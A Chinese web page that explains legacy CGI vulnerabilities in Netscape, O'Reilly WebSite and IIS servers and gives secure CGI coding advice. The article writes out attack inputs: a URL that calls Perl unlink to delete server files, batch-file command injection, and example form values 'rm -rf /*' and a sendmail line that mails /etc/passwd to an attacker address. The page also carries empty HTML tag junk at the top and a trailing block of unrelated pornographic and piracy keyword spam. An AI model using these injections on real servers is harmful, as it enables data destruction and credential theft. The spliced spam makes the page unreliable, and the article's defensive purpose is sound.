• <output id="aynwq"><form id="aynwq"><code id="aynwq"></code></form></output>

    <mark id="aynwq"><option id="aynwq"></option></mark>
  • <mark id="aynwq"><option id="aynwq"></option></mark><label id="aynwq"><dl id="aynwq"></dl></label>
  • 學(xué)習(xí)啦 > 學(xué)習(xí)電腦 > 電腦安全 > 防火墻知識 > Web安全技術(shù)與防火墻

    Web安全技術(shù)與防火墻

    時間: 林澤1002 分享

    Web安全技術(shù)與防火墻

      計算機(jī)的安全性歷來都是人們討論的主要話題之一。而計算機(jī)安全 主要研 究的是計算機(jī)病毒的防治和系統(tǒng)的安全。下面是學(xué)習(xí)啦小編跟大家分享的是Web安全技術(shù)與防火墻,歡迎大家來閱讀學(xué)習(xí)。

      Web安全技術(shù)與防火墻

      步驟/方法

      Perl解釋器的漏洞

      Netscape Communications Server中無法識別cgi-bin下的擴(kuò)展名 及其應(yīng) 用關(guān)系,如:.pl是PERL的代碼程序自動調(diào)用 perl.exe文件解 釋,即使現(xiàn)在也只 能把perl.exe文件存放在cgi-bin目錄之下。執(zhí)行 如: /cgi-bin/perl.exe?&my_script.pl. 但是這就給任何人都有執(zhí)行 perl 的可能, 當(dāng)有些人在其瀏覽器的URL中加上如: /cgi-bin/perl.exe?&-e+unlink+%3C*%3E 時,有可能造成刪除服務(wù)器當(dāng) 前目錄下文件的危險。但是,其他如:O'Reilly WebSite或Purveyor都 不存在這種漏洞。

      〖2〗CGI執(zhí)行批處理文件的漏洞

      文件名:test.bat:

      @echo off

      echo Content-type: text/plain

      echo

      echo Hello World!

      如果客戶瀏覽器的URL為:/cgi-bin/test.bat?&dir則執(zhí)行調(diào)用命 令解釋 器完成dir列表。這給訪問者有執(zhí)行其他命令可能性。

      2)O'Reilly WebSite server for Windows NT/95

      在WebSite1.1B以前的版本中使用配處理文件存在著Netscape同樣 的漏洞, 但是,新版關(guān)閉.bat在cgi中的作用。支持perl,VB和C作為CGI 開發(fā)工具。至于 他的安全問題參看: http://website.ora.com/devcomer/secalert1。

      3)Microsoft's IIS Web Server

      在96年3月5日前的IIS在NT下的.bat CGI的 bug甚至比其他更嚴(yán) 重,可以 任意使用command命令。但之后修補(bǔ)該漏洞。你可檢查你的可 執(zhí)行文件的建立日 期。IIS3.0還存在一些安全bug,主要是cgi-bin下的 覆給權(quán)利。

      另外,許多 WEB服務(wù)器本身都存在一些安全上的漏洞,都是在版本 升級過 程不斷更新。在這就不一一列舉。

      從CGI編程角度考慮安全:

      1〕采用編譯語言比解釋語言會更安全些,并且 CGI程序應(yīng)放在獨(dú) 立于HTML 存放目錄之外的CGI-BIN下,是為了防止一些非法訪問者從瀏覽 器端取得解釋性語 言的原代碼后從中尋找漏洞。

      2〕在用C來編寫CGI程序時盡量少用popen(), system()和所有涉 及/bin/sh 的shell命令。在Perl中system(), exec(), open(),eval() 等exec或eval之類命 令。在由用戶填寫的form還回cgi時,不要直接調(diào) 用system()之類函數(shù)。這是為避 免當(dāng)填寫內(nèi)容為“rm -rf /*”或 “/usr/lib/sendmail nobody@nowhere.com; mail badguys@hell.org< /etc/passwd”之類內(nèi)容。

      3〕用Perl編寫CGI時如:

      $mail_to = &get_name_from_input;

      open (MAIL,"| /usr/lib/sendmail $mail_to");

      print MAIL "To: $mailto\nFrom: me\n\nHi there!\n";

      close MAIL;

      該小程序是把客戶瀏覽器的form到服務(wù)器的mail處理程序。

    Web安全技術(shù)與防火墻相關(guān)文章:

    1.為什么要使用web防火墻

    2.常用網(wǎng)絡(luò)安全技術(shù)有哪些

    3.web應(yīng)用防火墻和傳統(tǒng)防火墻的區(qū)別

    4.web防火墻功能有哪些呢

    5.防火墻到底有沒有用

    6.WEB應(yīng)用防火墻的相關(guān)介紹

    2822875 主站蜘蛛池模板: 国产精品亚洲精品日韩已方| 日本三人交xxx69| 午夜福利一区二区三区高清视频 | 国产中文字幕在线视频| eeuss影院www新天堂| 最近中文字幕资源8| 四虎影院在线免费播放| 12345国产精品高清在线| 成人毛片在线视频| 亚洲一区二区三区电影| 精品卡2卡3卡4卡免费| 国产情侣真实露脸在线| MM1313亚洲精品无码| 无码专区国产精品视频| 亚洲成a人v欧美综合天堂麻豆 | 性欧美vr高清极品| 亚洲三级在线免费观看| 男女啪啪激烈高潮喷出GIF免费| 国产成人免费高清激情明星| assbbwbbwbbwbbwbw精品| 日本免费人成黄页在线观看视频 | 国产精品美女久久久久av超清| 中文精品久久久久人妻不卡| 污网站在线观看免费| 可以免费看黄的网站| 日本黄网站动漫视频免费| 在线私拍国产福利精品| 一级特色大黄美女播放网站| 毛片在线免费观看网站| 四虎在线免费视频| 亚洲最大激情中文字幕| 天堂一码二码专区| 久久久精品人妻无码专区不卡| 污污网站在线播放| 北条麻妃在线一区二区| 高潮毛片无遮挡高清免费| 国产精品自在自线| а天堂中文在线官网在线| 日本性生活网站| 亚洲中久无码永久在线观看同 | 手机在线视频你懂的|